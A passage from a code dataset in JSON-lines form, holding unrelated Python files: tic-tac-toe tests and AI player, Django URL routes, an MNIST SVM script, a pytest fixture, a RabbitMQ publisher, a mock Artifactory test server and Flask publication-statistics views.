self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n self.assertEqual(grid.get_winning_player(), self.player_2, (first, second))\n def test_get_grid_at_start(self):\n self.assertEqual(self.grid.get_grid(), \" \"*9)\n def test_get_grid_after_all_textual_moves(self):\n for move in Grid.textual_positions:\n self.grid.play(move)\n self.assertEqual(self.grid.get_grid(),\n (self.player_1 + self.player_2)*4 + self.player_1)\n def test_get_grid_after_all_moves_offset_by_3(self):\n moves = list(range(3,9))\n moves.extend(list(range(0,3)))\n for move in moves:\n self.grid.play(Grid.textual_positions[move])\n target = (self.player_1 + self.player_2 + self.player_1 +\n (self.player_1 + self.player_2)*3)\n self.assertEqual(self.grid.get_grid(), target)\n def test_get_grid_after_center_play(self):\n self.grid.play('center')\n self.assertEqual(self.grid.get_grid(), \" \"*4 + self.player_1 + \" \"*4)\n def test_get_grid_same_as_str(self):\n self.grid.play('center')\n self.grid.play('top_left')\n self.grid.play('bottom_right')\n self.assertEqual(self.grid.get_grid(), \"%s\" % self.grid)\n\nclass TicTacToeTest_XO(TicTacToeTest):\n player_1 = \"X\"\n player_2 = \"O\"\n def make_grid(self):\n return Grid(\"XO\")\n\nclass TicTacToeTest_OX(TicTacToeTest):\n player_1 = \"O\"\n player_2 = \"X\"\n def make_grid(self):\n return Grid(\"OX\")\n\nclass TicTacToeTest_star_plus(TicTacToeTest): # Demonstration of arbitrary marker pairs\n player_1 = \"*\"\n player_2 = \"+\"\n def make_grid(self):\n return Grid(\"*+\")\n\nclass TTTComputer:\n def __init__(self):\n self.triples = [ {0, 4, 8}, {2, 4, 6} ] # Diagonals\n for i in range(0,3):\n self.triples.append({0+(3*i), 1+(3*i), 2+(3*i)}) # Horizontals\n self.triples.append({0+i, 3+i, 6+i}) # Verticals\n def play_on_grid(self, grid: Grid, with_mark: str, vs_mark: str) -> None:\n grid_s = grid.get_grid()\n number_of_plays = len([entry for entry in grid_s if entry is not \" \"])\n # Try to win\n winning_move = self._try_to_win(grid_s, with_mark)\n if winning_move is not None:\n grid.play(Grid.textual_positions[winning_move])\n return\n # Block any potential losing move\n avoid_loss_move = self._try_to_avoid_loss(grid_s, vs_mark)\n if avoid_loss_move: # Non-empty list\n grid.play(Grid.textual_positions[avoid_loss_move[0]]) # Might be forked, play anyhow\n return\n # Try to detect a fork for computer and play there\n fork_move_for_me = self._detect_fork_move_for_mark(grid_s, with_mark, vs_mark)\n if fork_move_for_me: # Non-empty list\n grid.play(Grid.textual_positions[fork_move_for_me[0]])\n return\n # Try to detect a fork for opponent and play (block) there\n fork_move_for_opponent = self._detect_fork_move_for_mark(grid_s, vs_mark, with_mark)\n if fork_move_for_opponent: # Non-empty list\n grid.play(Grid.textual_positions[fork_move_for_opponent[0]])\n return\n # If center is not taken, take it, except on first move\n if number_of_plays > 0 and grid_s[4] == \" \":\n grid.play('center')\n return\n # Play in next available space\n for sequential_move in range(0, 9):\n if grid_s[sequential_move] == \" \":\n grid.play(Grid.textual_positions[sequential_move])\n return\n return\n def _try_to_win(self, grid_str: str, with_mark: str) -> Optional[int]:\n '''Tries to find a move to win; if so, returns index, otherwise None.'''\n my_marks = {idx for idx, what in enumerate(grid_str) if what is with_mark}\n # We know we have one entry, so using pop is safe (triple less length=2 item)\n winning_moves = [(triple - (triple & my_marks)).pop() for triple in self.triples\n if len(triple & my_marks) == 2]\n if winning_moves:\n empty_winning_moves = [move for move in winning_moves if grid_str[move] == \" \"]\n if empty_winning_moves:\n assert(len(empty_winning_moves)==1) # FIXME? Previous code assumed this\n return empty_winning_moves[0]\n return None\n def _try_to_avoid_loss(self, grid_str: str, vs_mark: str) -> List[int]:\n '''Tries to find if a position must be played to block an opponent's win.\n If so, returns that index, otherwise None.'''\n vs_marks = {idx for idx, what in enumerate(grid_str) if what is vs_mark}\n # We know we have one entry, so using pop is safe (triple less length=2 item)\n avoid_loss_moves = [(triple - (triple & vs_marks)).pop() for triple in self.triples\n if len(triple & vs_marks) == 2]\n if avoid_loss_moves:\n empty_avoid_loss_moves = [move for move in avoid_loss_moves if grid_str[move] == \" \"]\n if empty_avoid_loss_moves:\n return empty_avoid_loss_moves\n return []\n def _detect_fork_move_for_mark(self, grid_str: str, mark: str, other_mark: str) -> List[int]:\n '''Tries to find if a position exists where 'mark' can fork.\n If so, returns that index, otherwise None.'''\n marks = {idx for idx, what in enumerate(grid_str) if what is mark}\n other_marks = {idx for idx, what in enumerate(grid_str) if what is other_mark}\n intersecting_triples = [(triple, triple & marks, triple - marks) for triple in self.triples\n if (triple & marks) != set() and triple & other_marks == set()]\n forks = {(a & available).pop() # Can pop since not an empty set\n for triple, overlap, available in intersecting_triples\n for t, o, a in intersecting_triples\n if triple != t and (a & available) != set()}\n if forks:\n return list(forks)\n return []\n\nclass TTT_computer_test(unittest.TestCase):\n def setUp(self):\n self.computer = TTTComputer()\n self.grid = Grid(\"XO\")\n def assertNumberOfPlaysOnGrid(self, grid_str: str, number_of_plays: int, msg=\"\"):\n expected_number_of_plays = len([entry for entry in grid_str if entry is not \" \"])\n self.assertEqual(expected_number_of_plays, number_of_plays, msg=msg)\n def print_grid_2d(self, grid_str: str):\n grid_str_ = \"\".join([\"_\" if chr == \" \" else chr for chr in grid_str])\n print()\n print(grid_str_[0:3])\n print(grid_str_[3:6])\n print(grid_str_[6:9])\n print()\n\n def test_TTTComputer_exists(self):\n self.assertIsNotNone(self.computer)\n def test_computer_play_leaves_grid_not_empty(self):\n self.assertTrue(self.grid.is_empty())\n self.computer.play_on_grid(self.grid, \"X\", \"O\")\n self.assertFalse(self.grid.is_empty())\n def test_computer_tries_to_win_from_2_in_row_down_left_side(self):\n self.grid.play('top_left') # X\n self.grid.play('top_right') # O\n self.grid.play('bottom_left') # X\n self.grid.play('bottom_right') # O\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n self.assertEqual(self.grid.get_grid(), \"X OX X O\")\n self.assertEqual(self.grid.get_winning_player(), 'X')\n def test_computer_tries_to_win_from_2_in_row_down_right_side(self):\n self.grid.play('top_right') # X\n self.grid.play('top_left') # O\n self.grid.play('bottom_right') # X\n self.grid.play('bottom_left') # O\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n self.assertEqual(self.grid.get_grid(), \"O X XO X\")\n self.assertEqual(self.grid.get_winning_player(), 'X')\n def test_computer_doesnt_try_to_win_where_opponent_has_marker(self):\n self.grid.play('top_right') # X\n self.grid.play('top_left') # O\n self.grid.play('bottom_right') # X\n self.grid.play('middle_right') # O [blocks X win]\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n self.assertNumberOfPlaysOnGrid(self.grid.get_grid(), 5)\n def test_computer_plays_in_blank_if_cant_win(self):\n for move_2 in range(1, 9):\n grid = Grid(\"XO\") # Use new grid each time\n grid.play('top_left')\n grid.play(Grid.textual_positions[move_2])\n self.computer.play_on_grid(grid, \"X\", \"O\")\n self.assertNumberOfPlaysOnGrid(grid.get_grid(), 3, Grid.textual_positions[move_2])\n def test_computer_can_block(self):\n self.grid.play('top_right') # X\n self.grid.play('top_left') # O\n self.grid.play('bottom_middle') # X\n self.grid.play('middle_left') # O\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n grid_s = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_s, 5)\n self.assertEqual(grid_s, \"O XO XX \")\n def test_computer_plays_in_center_if_unoccupied_and_not_first_move(self):\n for move_1 in range(0, 9):\n grid = Grid(\"XO\") # Use new grid each time\n grid.play(Grid.textual_positions[move_1])\n self.computer.play_on_grid(grid, \"O\", \"X\")\n self.assertNumberOfPlaysOnGrid(grid.get_grid(), 2, Grid.textual_positions[move_1])\n expected_grid = [\"X\" if i==move_1 else \" \" for i in range(0, 9)]\n if move_1 != 4:\n expected_grid[4] = \"O\"\n else:\n expected_grid[0] = \"O\"\n self.assertEqual(grid.get_grid(), \"\".join(expected_grid))\n def test_computer_starts_in_the_corner(self): # best probabilistic strategy\n self.computer.play_on_grid(self.grid, \"X\", \"O\")\n grid_s = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_s, 1)\n X_index = grid_s.find(\"X\")\n self.assertTrue(X_index in (0, 2, 6, 8))\n def test_computer_detects_and_plays_a_fork(self):\n self.grid.play('top_left')\n self.grid.play('top_middle')\n self.grid.play('center')\n self.grid.play('bottom_right')\n self.computer.play_on_grid(self.grid, \"X\", \"O\")\n grid_str = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_str, 5)\n self.assertIn(grid_str, (\"XO XX O\", \"XO X X O\"))\n def test_computer_detects_and_blocks_fork(self):\n self.grid.play('center')\n self.computer.play_on_grid(self.grid, \"O\", \"X\")\n self.grid.play('bottom_right')\n self.computer.play_on_grid(self.grid, \"O\", \"X\")\n grid_str = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_str, 4)\n self.assertEqual(grid_str, \"O O X X\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":21076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458646057","text":"from django.conf.urls import patterns, url\n\nfrom publications import views\n\nurlpatterns = patterns('',\n # Publications List\n url(r'^$', views.publications, name='publications'),\n\n # General publication actions\n # url(r'^create/$', views.createPublication, name='createPublication'),\n url(r'^vote/$', views.votePublication, name='votePublication'),\n url(r'^delete/$', views.deletePublication, name='deletePublication'),\n\n # Announcements actions\n # url(r'^announcements/$', views.announcements, name='announcements'),\n # url(r'^announcements/create/$', views.createAnnouncement, name='createAnnouncement'),\n # url(r'^announcements/(?P\\d+)$', views.announcementDetails, name='announcementDetails'),\n # url(r'^announcements/edit/(?P\\d+)$', views.editAnnouncement, name='editAnnouncement'),\n\n # Class material actions\n # url(r'^classmaterial/$', views.classMaterial, name='classMaterial'),\n # url(r'^classmaterial/create/$', views.createClassMaterial, name='createClassMaterial'),\n # url(r'^classmaterial/(?P\\d+)$', views.classMaterialDetails, name='classMaterialDetails'),\n # url(r'^classmaterial/edit/(?P\\d+)$', views.editClassMaterial, name='editClassMaterial'),\n\n # Event actions\n url(r'^events/$', views.events, name='events'),\n url(r'^events/create/$', views.createEvent, name='createEvent'),\n url(r'^events/(?P\\d+)$', views.eventDetails, name='eventDetails'),\n url(r'^events/edit/(?P\\d+)$', views.editEvent, name='editEvent'),\n\n # Job Offer actions\n # url(r'^joboffers/$', views.joboffers, name='joboffers'),\n # url(r'^joboffers/create/$', views.createJobOffer, name='createJobOffer'),\n # url(r'^joboffers/(?P\\d+)$', views.jobOfferDetails, name='jobOfferDetails'),\n # url(r'^joboffers/edit/(?P\\d+)$', views.editJobOffer, name='editJobOffer'),\n\n # Lost and Found Actions\n # url(r'^lostandfound/$', views.lostAndFound, name='lostAndFound'),\n # url(r'^lostandfound/create/$', views.createLostAndFound, name='createLostAndFound'),\n # url(r'^lostandfound/(?P\\d+)$', views.lostAndFoundDetails, name='lostAndFoundDetails'),\n # url(r'^lostandfound/edit/(?P\\d+)$', views.editLostAndFound, name='editLostAndFound'),\n \n # Buy and Sell Actions\n # url(r'^buyandsell/$', views.buyandsell, name='buyandsell'),\n # url(r'^buyandsell/create/$', views.createBuyAndSell, name='createBuyAndSell'),\n # url(r'^buyandsell/(?P\\d+)$', views.buyAndSellDetails, name='buyAndSellDetails'),\n # url(r'^buyandsell/edit/(?P\\d+)$', views.editBuyAndSell, name='editBuyAndSell'),\n)\n","sub_path":"publications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206432730","text":"from sklearn import svm, metrics\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\n\r\ndef changeValue(lst):\r\n return [float(v)/255 for v in lst]\r\n\r\n## 0. Training Data, Test Data\r\n\r\ncsv = pd.read_csv('C:/PySource/Project1/mnist/train_10k.csv')\r\ntrain_data = csv.iloc[:, 1:].values\r\ntrain_data = list(map(changeValue, train_data))\r\ntrain_label = csv.iloc[:, 0].values\r\n\r\ncsv = pd.read_csv('C:/PySource/Project1/mnist/t10k_0.5k.csv')\r\ntest_data = csv.iloc[:, 1:].values\r\ntest_data = list(map(changeValue, test_data))\r\ntest_label = csv.iloc[:, 0].values\r\n## 학습용, 훈련용 분리\r\n\r\n# train_data, test_data, train_label, test_label = \\\r\n# train_test_split(train_data, train)label, train_size=0.3)\r\n## 1. Create Classfire - Select ML Algorithm\r\n\r\nclf = svm.NuSVC(gamma='auto')\r\n\r\n## 2. Learning Data\r\n#clf.fit([훈련 데이터], [정답])\r\n\r\nclf.fit(train_data, train_label)\r\n\r\nimport joblib\r\n\r\njoblib.dump(clf,'mnist_model_10k.dmp')\r\n\r\nclf=joblib.load('mnist_model_10k.dmp')\r\n\r\n\r\n## 3. Predict\r\n# clf.predict([예측할 데이터])\r\n\r\n## 4. Check Accuracy Rate\r\n\r\nresult = clf.predict(test_data)\r\n\r\nscore = metrics.accuracy_score(result, test_label)\r\nprint(result)\r\nprint(\"정답률: \",\"{0:.2f}%\".format(score*100))\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimg= np.array(test_data[0]).reshape([28,28])\r\nplt.imshow(img, cmap='gray')\r\nplt.show()\r\n\r\n","sub_path":"Code14-07 ML scikit-Learn 06 MNIST 모델 저장.py","file_name":"Code14-07 ML scikit-Learn 06 MNIST 모델 저장.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"373909588","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport tempfile\nfrom shutil import rmtree\n\nimport pytest\n\n__author__ = \"Florian Wilhelm\"\n__copyright__ = \"Blue Yonder\"\n__license__ = \"new BSD\"\n\n\n@pytest.yield_fixture()\ndef tmpdir():\n old_path = os.getcwd()\n newpath = tempfile.mkdtemp()\n os.chdir(newpath)\n yield\n rmtree(newpath)\n os.chdir(old_path)","sub_path":"tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"172794678","text":"import pika\nfrom time import sleep\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='cle_queue')\n\n\ndef publish(message):\n channel.basic_publish(exchange='',\n routing_key='cle_queue',\n body=message)\n print(\"Published to rabbit\")\n print(message)\n\n\nif __name__ == '__main__':\n while True:\n publish(\"test\")\n sleep(1)\n","sub_path":"CLE/ds/rabbit.py","file_name":"rabbit.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"609257713","text":"#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nimport json, os, os.path as path\nfrom bes.web.web_server import web_server\nfrom bes.system.log import log\nfrom bes.fs.file_find import file_find\nfrom bes.fs.file_util import file_util\nfrom bes.compat import url_compat\n\nfrom .artifactory_requests import artifactory_requests\n\nclass mock_artifactory_server(web_server):\n 'A mock artifactory web server. Tries to impersonate artifactory enough to do unit tests.'\n\n def __init__(self, port = None, root_dir = None, artifactory_id = '', users = None):\n super(mock_artifactory_server, self).__init__(port = port, users = users, log_tag = 'artifactory')\n self._root_dir = root_dir or os.getcwd()\n self._artifactory_id = artifactory_id\n\n _ERROR_404_HTML = '''\n\n \n 404 - Not found\n \n \n

404 - Not found

\n \n\n'''\n\n _ERROR_405_HTML = '''\n\n \n 405 - Method not supported\n \n \n

405 - Method not supported

\n \n\n'''\n \n def handle_request(self, environ, start_response):\n print_environ = False\n #print_environ = True\n \n print_headers = False\n #print_headers = True\n\n if print_headers:\n for key, value in sorted(self.headers.items()):\n log.output('HEADER: %s=%s\\n' % (key, value), console = True)\n\n if print_environ:\n for key, value in sorted(environ.items()):\n log.output('%s=%s\\n' % (key, value), console = True)\n method = environ['REQUEST_METHOD']\n path_info = self.path_info(environ)\n if path_info.path_info.startswith('/api'):\n return self._api(environ, path_info, start_response)\n if method == 'GET':\n return self._get(environ, path_info, start_response)\n elif method == 'PUT':\n return self._put(environ, path_info, start_response)\n if method == 'HEAD':\n return self._head(environ, path_info, start_response)\n else:\n return self.response_error(start_response, 405)\n\n def _get(self, environ, path_info, start_response):\n if not path.isfile(path_info.rooted_filename):\n return self.response_error(start_response, 404)\n mime_type = self.mime_type(path_info.rooted_filename)\n content = file_util.read(path_info.rooted_filename)\n headers = [\n ( 'Content-Type', str(mime_type) ),\n ( 'Content-Length', str(len(content)) ),\n ( 'X-Artifactory-Filename', path.basename(path_info.path_info) ),\n ( 'X-Artifactory-Id', self._artifactory_id ),\n ]\n headers += artifactory_requests.checksum_headers_for_file(path_info.rooted_filename).items()\n return self.response_success(start_response, 200, [ content ], headers)\n\n def _head(self, environ, path_info, start_response):\n if not path.isfile(path_info.rooted_filename):\n return self.response_error(start_response, 404)\n mime_type = self.mime_type(path_info.rooted_filename)\n headers = [\n ( 'Content-Type', str(mime_type) ),\n ( 'Content-Length', str(file_util.size(path_info.rooted_filename)) ),\n ( 'X-Artifactory-Filename', path.basename(path_info.path_info) ),\n ( 'X-Artifactory-Id', self._artifactory_id ),\n ]\n headers += artifactory_requests.checksum_headers_for_file(path_info.rooted_filename).items()\n return self.response_success(start_response, 200, [], headers)\n \n def _put(self, environ, path_info, start_response):\n 'https://www.jfrog.com/confluence/display/RTF/Artifactory+REST+API#ArtifactoryRESTAPI-DeployArtifact'\n content_length = int(environ['CONTENT_LENGTH'])\n# filename = environ['PATH_INFO']\n# filename = file_util.lstrip_sep(filename)\n# file_path = path.join(self._root_dir, filename)\n fin = environ['wsgi.input']\n chunk_size = 1024\n n = int(content_length / chunk_size)\n r = int(content_length % chunk_size)\n file_util.ensure_file_dir(path_info.rooted_filename)\n with open(path_info.rooted_filename, 'wb') as fout:\n for i in range(0, n):\n chunk = fin.read(chunk_size)\n fout.write(chunk)\n if r:\n chunk = fin.read(r)\n fout.write(chunk)\n fout.flush()\n fout.close()\n base = '%s://%s' % (environ['wsgi.url_scheme'], environ['HTTP_HOST'])\n uri = url_compat.urljoin(base, path_info.path_info)\n data = {\n 'downloadUri': uri,\n }\n content = json.dumps(data, indent = 2) + '\\n'\n content = content.encode('utf8')\n headers = [\n ( 'Content-Type', 'application/json' ),\n ( 'Content-Length', str(len(content)) ),\n ]\n return self.response_success(start_response, 201, [ content ], headers)\n\n def _api(self, environ, path_info, start_response):\n parts = path_info.path_info.split('/')\n what = parts[2]\n if what == 'storage':\n return self._api_storage(environ, path_info, start_response)\n assert False\n\n def _api_storage(self, environ, path_info, start_response):\n xpath = file_util.remove_head(path_info.path_info, '/api/storage')\n fpath = path.join(self._root_dir, xpath)\n files = file_find.find(fpath, relative = True)\n for f in files:\n print('FILE: %s' % (f))\n# print(xpath)\n import sys\n sys.stdout.flush()\n assert False\n","sub_path":"lib/rebuild/artifactory/mock_artifactory_server.py","file_name":"mock_artifactory_server.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"146840927","text":"from comp61542 import app\nfrom database import database\nfrom flask import (render_template, request)\nfrom comp61542.statistics import utils\nimport json\nfrom flask.json import jsonify\ndef format_data(data):\n fmt = \"%.2f\"\n result = []\n for item in data:\n if type(item) is list:\n result.append(\", \".join([ (fmt % i).rstrip('0').rstrip('.') for i in item ]))\n else:\n result.append((fmt % item).rstrip('0').rstrip('.'))\n return result\n\n@app.route(\"/averages\")\ndef showAverages():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Averages\", link= \"/averages\")\n \n args = {\"dataset\":dataset, \"id\":\"averages\"}\n args['title'] = \"Averaged Data\"\n db.title_cache = args['title']\n tables = []\n headers = [\"Average\", \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\", \"All Publications\"]\n averages = [ database.Stat.MEAN, database.Stat.MEDIAN, database.Stat.MODE ]\n tables.append({\n \"id\":1,\n \"title\":\"Average Authors per Publication\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_authors_per_publication(i)[1])\n for i in averages ] })\n tables.append({\n \"id\":2,\n \"title\":\"Average Publications per Author\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_publications_per_author(i)[1])\n for i in averages ] })\n tables.append({\n \"id\":3,\n \"title\":\"Average Publications in a Year\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_publications_in_a_year(i)[1])\n for i in averages ] })\n tables.append({\n \"id\":4,\n \"title\":\"Average Authors in a Year\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_authors_in_a_year(i)[1])\n for i in averages ] })\n\n args['tables'] = tables\n args[\"breadcrump\"] = db.breadcrump\n return render_template(\"averages.html\", args=args)\n\n\n\n@app.route(\"/coauthors\")\ndef showCoAuthors():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"coauthors\", link= \"/coauthors\")\n \n PUB_TYPES = [\"Conference Papers\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n args = {\"dataset\":dataset, \"id\":\"coauthors\"}\n args[\"title\"] = \"Co-Authors\"\n \n db.title_cache = args['title']\n start_year = db.min_year\n if \"start_year\" in request.args:\n start_year = int(request.args.get(\"start_year\"))\n\n end_year = db.max_year\n if \"end_year\" in request.args:\n end_year = int(request.args.get(\"end_year\"))\n\n pub_type = 4\n if \"pub_type\" in request.args:\n pub_type = int(request.args.get(\"pub_type\"))\n\n args[\"data\"] = db.get_coauthor_data(start_year, end_year, pub_type)\n args[\"start_year\"] = start_year\n args[\"end_year\"] = end_year\n args[\"pub_type\"] = pub_type\n args[\"min_year\"] = db.min_year\n args[\"max_year\"] = db.max_year\n args[\"start_year\"] = start_year\n args[\"end_year\"] = end_year\n args[\"pub_str\"] = PUB_TYPES[pub_type]\n db.args_cache = args\n db.title_cache = args['title']\n args[\"breadcrump\"] = db.breadcrump\n return render_template(\"coauthors.html\", args=args)\n\n@app.route(\"/firstLastSoleType\")\ndef showAuthorFirstLastSolePerType():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Author order\", link=\"/firstLastSoleType\")\n PUB_TYPES = [\"Conference Papers\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n args = {\"dataset\":dataset, \"id\":\"firstLastSoleType\"}\n args[\"title\"] = \"Author First/Last/Sole per publication type\"\n \n db.title_cache = args['title']\n \n pub_type = 4\n if \"pub_type\" in request.args:\n pub_type = int(request.args.get(\"pub_type\"))\n\n args[\"data\"] = db.get_all_authors_stats(pub_type)\n args[\"pub_type\"] = pub_type\n args[\"pub_str\"] = PUB_TYPES[pub_type]\n db.args_cache = args\n db.title_cache = args['title']\n return render_template('authorFirstLastSolePerType.html', args=args)\n\n@app.route(\"/\")\ndef showStatisticsMenu():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Home\", link= \"/\", level=0)\n \n args = {\"dataset\":dataset}\n return render_template('statistics.html', args=args)\n\n@app.route(\"/statisticsdetails/\")\ndef showPublicationSummary(status):\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n args = {\"dataset\":dataset, \"id\":status}\n if (status == \"publication_summary\"):\n args[\"title\"] = \"Publication Summary\"\n args[\"data\"] = db.get_publication_summary()\n \n if (status == \"publication_author\"):\n args[\"title\"] = \"Author Publication\"\n args[\"data\"] = db.get_publications_by_author()\n\n if (status == \"publication_year\"):\n args[\"title\"] = \"Publication by Year\"\n args[\"data\"] = db.get_publications_by_year()\n\n if (status == \"author_year\"):\n args[\"title\"] = \"Author by Year\"\n args[\"data\"] = db.get_author_totals_by_year()\n \n if (status == \"author_first_last_sole\"):\n args[\"title\"] = \"Author statistics\"\n args[\"data\"] = db.get_all_authors_stats()\n \n if (status == \"author_first_last_sole_per_type\"):\n args[\"title\"] = \"Author statistics per type\"\n args[\"data\"] = db.get_all_authors_stats(3)\n \n db.title_cache = args['title']\n db.set_breadcrump(name=args[\"title\"], link=\"/statisticsdetails/\" + status )\n args[\"breadcrump\"] = db.breadcrump\n return render_template('statistics_details.html', args=args)\n\n@app.route(\"/authorsDegreeOfSeparation\")\ndef displayDegreeOfSeparation():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Degree of separation\", link=\"/authorsDegreeOfSeparation\")\n args = {\"dataset\":dataset}\n args[\"title\"] = \"Degree Of Separation\"\n# author_names = [ author.name for author in db.authors ]\n# authors = [ author.name for author in db.authors ]\n author_A = \" - \"\n author_B = \" - \"\n degree_of_separation = \" - \"\n args[\"graph_js\"] = None\n db.cache_graph = None\n if \"authorA\" in request.args and \"authorB\" in request.args:\n author_A = request.args.get(\"authorA\")\n author_B = request.args.get(\"authorB\")\n db.generate_degrees_of_separation_graph()\n degree_of_separation=db.bfs(db.author_idx[author_A], db.author_idx[author_B])\n url = \"/authorsDegreeOfSeparation?authorA=\" + author_A + \"&authorB=\" + author_B\n db.set_breadcrump(name=author_A + \" | \" + author_B, link=url, level=2)\n graph = db.dfs(db.author_idx[author_A], db.author_idx[author_B], degree_of_separation+1)\n db.cache_graph = graph\n if degree_of_separation==-1:\n degree_of_separation=\"X\"\n args[\"columns\"] = (\"Author A\", \"Author B\", \"Degree of Separation\")\n author_names = db.author_idx.keys()\n author_names.sort()\n args[\"author_names\"] = author_names\n args[\"authorA\"] = author_A\n args[\"authorB\"] = author_B\n args[\"degree_of_separation\"] = degree_of_separation\n args[\"breadcrump\"] = db.breadcrump\n \n \n return render_template(\"authorsDegreeOfSeparation.html\", args=args)\n\n@app.route(\"/graph//\")\ndef getGraph(authora, authorb):\n db = app.config['DATABASE']\n db.generate_degrees_of_separation_graph()\n degree_of_separation=db.bfs(db.author_idx[authora], db.author_idx[authorb])\n graph = db.dfs(db.author_idx[authora], db.author_idx[authorb], degree_of_separation+1)\n return jsonify(db.convertIDGraphToNames(graph))\n\n@app.route(\"/publications/\")\ndef displayPublications(sortby):\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n args = {\"dataset\":dataset, \"id\":sortby}\n sortby = sortby.lower()\n args[\"title\"] = \"Publications\" \n \n if (sortby == \"year\"):\n db.publications = db.sortPublicationsByYear()\n elif (sortby == \"authors\"):\n db.publications = db.sortPublicationsByFirstAuthors()\n elif (sortby == \"title\"):\n db.publications = db.sortPublicationsByTitle()\n elif sortby == \"type\":\n db.publications = db.sortPublicationsByType()\n else:\n db.publications = db.sortPublicationsByTitle()\n \n args[\"data\"] = db.get_publication_list()\n db.title_cache = args['title']\n \n return render_template('publications.html', args=args)\n\n@app.route(\"/author/firstlast\")\ndef displayAuthorFirstLastSoleStats():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n try:\n authorname = request.args.get('fname')\n args = {\"dataset\":dataset, \"id\":authorname}\n first = db.get_times_as_first(authorname)\n last = db.get_times_as_last(authorname)\n author = {'name':authorname, 'first':first, 'last':last}\n args['title'] = \"Author First/Last/Sole stats\"\n db.title_cache = args['title']\n \n args['data'] = utils.author_stats_fist_last_table(author)\n db.cache = args['data'][1]\n db.header_cache = args['data'][0]\n db.sorted_cache = [ False for i in range(0, len(db.header_cache))]\n return render_template('author_first_last.html', args=args)\n except:\n return firstlast()\n \n@app.route(\"/stats/\")\ndef sortByField(field):\n db = app.config['DATABASE']\n dataset = app.config['DATASET']\n field = int(field)\n args = {\"dataset\":dataset, \"id\":field}\n db.sort_cache_generic(field)\n db.set_breadcrump(name=\"Order by field: \" + db.header_cache[field], link=\"/stats/\"+str(field), level=2)\n args['data'] = (db.header_cache, db.cache)\n try:\n args['title'] = db.title_cache\n except:\n pass #no title cached\n args[\"breadcrump\"] = db.breadcrump\n return render_template('statistics_details.html', args = args)\n\n@app.route(\"/stats/coauthors/\")\ndef sortByCoauthorField(field):\n db = app.config['DATABASE']\n field = int(field)\n db.sort_cache_generic(field)\n \n args = db.args_cache \n args['data'] = (db.header_cache, db.cache)\n try:\n args['title'] = db.title_cache\n except:\n pass #no title cached\n \n \n db.title_cache = args['title']\n\n \n return render_template('coauthors.html', args = args)\n\n@app.route(\"/stats/authors/\")\ndef sortStatsField(field):\n db = app.config['DATABASE']\n field = int(field)\n db.sort_cache_generic(field)\n \n args = db.args_cache \n args['data'] = (db.header_cache, db.cache)\n try:\n args['title'] = db.title_cache\n except:\n pass #no title cached\n \n \n db.title_cache = args['title']\n\n args[\"breadcrump\"] = db.breadcrump \n return render_template('authorFirstLastSolePerType.html', args = args)\n\n\n \ndef displayAuthorStats(authorname, args):\n db = app.config['DATABASE']\n \n try:\n author_stats = db.get_author_stats(authorname)\n author = {'name':authorname, \"Conference\": author_stats[0], \"Journal\": author_stats[1], \"Book\": author_stats[2],\n \"Book Chapter\": author_stats[3], \"first\": author_stats[4], \"last\": author_stats[5], \"sole\": author_stats[6],\n \"Total\": author_stats[7], \"coauthors\": author_stats[8]}\n args['data'] = utils.author_all_stats_table(author)\n args['title'] = str(authorname)\n db.title_cache = args['title']\n return render_template('search_for_author.html', args=args)\n except:\n return searchPage()\n\n\ndef displayAuthorListWithHyperlinks(authors, args):\n db = app.config['DATABASE']\n \n args['title'] = \"Search result\"\n db.title_cache = args['title']\n header = [\"Author Name\"]\n data = [[author.name] for author in authors]\n 